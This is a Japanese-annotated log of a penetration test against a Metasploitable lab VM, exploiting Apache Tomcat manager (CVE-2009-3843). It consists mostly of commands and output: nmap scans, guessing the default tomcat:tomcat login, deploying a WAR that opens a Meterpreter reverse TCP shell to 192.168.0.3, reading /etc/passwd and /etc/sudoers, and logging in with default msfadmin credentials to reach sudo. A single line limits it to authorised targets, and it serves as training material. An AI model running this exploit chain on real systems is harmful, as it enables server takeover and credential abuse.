■CVE-2009-3843調査のために、Meterpreterを使用する。
許可された対象のみに行うこと。
msf > search type:payload platform:linux reverse_tcp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
payload/java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
payload/linux/aarch64/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
payload/linux/aarch64/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/aarch64/shell/reverse_tcp normal Linux dup2 Command Shell, Reverse TCP Stager
payload/linux/aarch64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/armbe/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/armle/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
payload/linux/armle/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/armle/shell/reverse_tcp normal Linux dup2 Command Shell, Reverse TCP Stager
payload/linux/armle/shell_bind_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/mips64/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/mipsbe/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
payload/linux/mipsbe/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/mipsbe/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
payload/linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/mipsle/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
payload/linux/mipsle/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/mipsle/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
payload/linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/ppc/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/ppc64le/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/ppce500v2/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/x64/meterpreter/reverse_tcp normal Linux Mettle x64, Reverse TCP Stager
payload/linux/x64/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/x64/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
payload/linux/x64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Mettle x86, Reverse TCP Stager (IPv6)
payload/linux/x86/meterpreter/reverse_nonx_tcp normal Linux Mettle x86, Reverse TCP Stager
payload/linux/x86/meterpreter/reverse_tcp normal Linux Mettle x86, Reverse TCP Stager
payload/linux/x86/meterpreter/reverse_tcp_uuid normal Linux Mettle x86, Reverse TCP Stager
payload/linux/x86/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
payload/linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
payload/linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
payload/linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager
payload/linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
payload/linux/x86/shell/reverse_tcp_uuid normal Linux Command Shell, Reverse TCP Stager
payload/linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
payload/linux/zarch/meterpreter_reverse_tcp normal Linux Meterpreter, Reverse TCP Inline
msf post(linux/gather/hashdump) > search type:post platform:linux sudo
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/linux/gather/enum_users_history normal Linux Gather User History
post/multi/manage/sudo normal Multiple Linux / Unix Post Sudo Upgrade Shell
■CVE-2009-3843モジュールの検索
msf > search CVE-2009-3843
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
■msfconsoleで使用するモジュールの階層を確認。
$ ls /usr/share/metasploit-framework/modules/
auxiliary encoders exploits nops payloads post
■exploitで使用するrubyスクリプトを確認。
$ find /usr/share/metasploit-framework/modules/ -type f -name "tomcat*"
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/tomcat_mgr_login.rb
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/tomcat_enum.rb
/usr/share/metasploit-framework/modules/auxiliary/admin/http/tomcat_administration.rb
/usr/share/metasploit-framework/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
/usr/share/metasploit-framework/modules/post/multi/gather/tomcat_gather.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_jsp_upload_bypass.rb
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_deploy.rb
■meterpreterで使用するスクリプトを確認。
$ find /usr/share/metasploit-framework/modules/ -type f -name "meterpreter*" | grep x86
/usr/share/metasploit-framework/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
/usr/share/metasploit-framework/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
/usr/share/metasploit-framework/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
/usr/share/metasploit-framework/modules/payloads/stages/linux/x86/meterpreter.rb
■nmapのnseスクリプトに該当するのはtcp/8009の以下のみ。
$ dpkg -L nmap | grep ajp-brute
/usr/share/nmap/scripts/ajp-brute.nse
■nmap調査
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 07:34 JST
Nmap scan report for 192.168.0.2
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 52:54:00:9F:16:32 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 07:34 JST
Nmap scan report for 192.168.0.2
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 52:54:00:9F:16:32 (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.0.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.72 seconds
■TCP/8009では認証していない。
$ nmap --script ajp-brute.nse -p 8009 192.168.0.2
Starting Nmap 7.40 ( https://nmap.org ) at 2018-05-06 07:36 JST
Nmap scan report for 192.168.0.2
Host is up (0.00042s latency).
PORT STATE SERVICE
8009/tcp open ajp13
| ajp-brute:
|_ URL does not require authentication
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
■tcp/8180からログイン情報の取得
msf > search type:auxiliary CVE-2009-3843
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.0.2
RHOSTS => 192.168.0.2
msf auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(scanner/http/tomcat_mgr_login) > exploit
...
[+] 192.168.0.2:8180 - Login Successful: tomcat:tomcat
...
■exploitでshellを起動する。
joe passwordユーザが一人でもいて、sudoを許可されていればroot権限と同等となる。
msf > search type:exploit CVE-2009-3843
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(multi/http/tomcat_mgr_deploy) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(multi/http/tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(multi/http/tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Java Universal
2 Windows Universal
3 Linux x86
msf exploit(multi/http/tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(multi/http/tomcat_mgr_deploy) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/tomcat_mgr_deploy) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(multi/http/tomcat_mgr_deploy) > set LPORT 8443
LPORT => 8443
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.0.2 yes The target address
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.0.3 yes The listen address
LPORT 8443 yes The listen port
Exploit target:
Id Name
-- ----
3 Linux x86
msf exploit(multi/http/tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.0.3:8443
[*] Using manually select target "Linux x86"
[*] Uploading 1664 bytes as j14aC2foRdhh.war ...
[*] Executing /j14aC2foRdhh/7VzvsIkB7dE6tpNHfC4YIUXHXJ9L.jsp...
[*] Undeploying j14aC2foRdhh ...
[*] Sending stage (857352 bytes) to 192.168.0.2
[*] Meterpreter session 1 opened (192.168.0.3:8443 -> 192.168.0.2:45008) at 2018-05-06 07:56:58 +0900
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=110, gid=65534, euid=110, egid=65534
meterpreter > getpid
Current pid: 9512
meterpreter > cd /tmp
meterpreter > upload autoroot.sh
[*] uploading : autoroot.sh -> autoroot.sh
[*] 192.168.0.2 - Meterpreter session 1 closed. Reason: Died
[-] Error running command upload: Rex::TimeoutError Operation timed out.
msf exploit(multi/http/tomcat_mgr_deploy) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.0.3:8443
[*] Using manually select target "Linux x86"
[*] Uploading 1628 bytes as 0MAvdam3Bdl.war ...
[*] Executing /0MAvdam3Bdl/zdOsYWiueLz243hssijBX5Zio.jsp...
[*] Undeploying 0MAvdam3Bdl ...
[*] Sending stage (857352 bytes) to 192.168.0.2
[*] Meterpreter session 2 opened (192.168.0.3:8443 -> 192.168.0.2:44078) at 2018-05-06 09:24:47 +0900
meterpreter > shell
Process 9514 created.
Channel 1 created.
whoami
tomcat55
pwd
/
grep 1000 /etc/passwd
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
telnet 127.0.0.1
metasploitable login: msfadmin
msfadmin
Password: msfadmin
$ sudo grep adm /etc/sudoers
sudo grep adm /etc/sudoers
%admin ALL=(ALL) ALL
exit
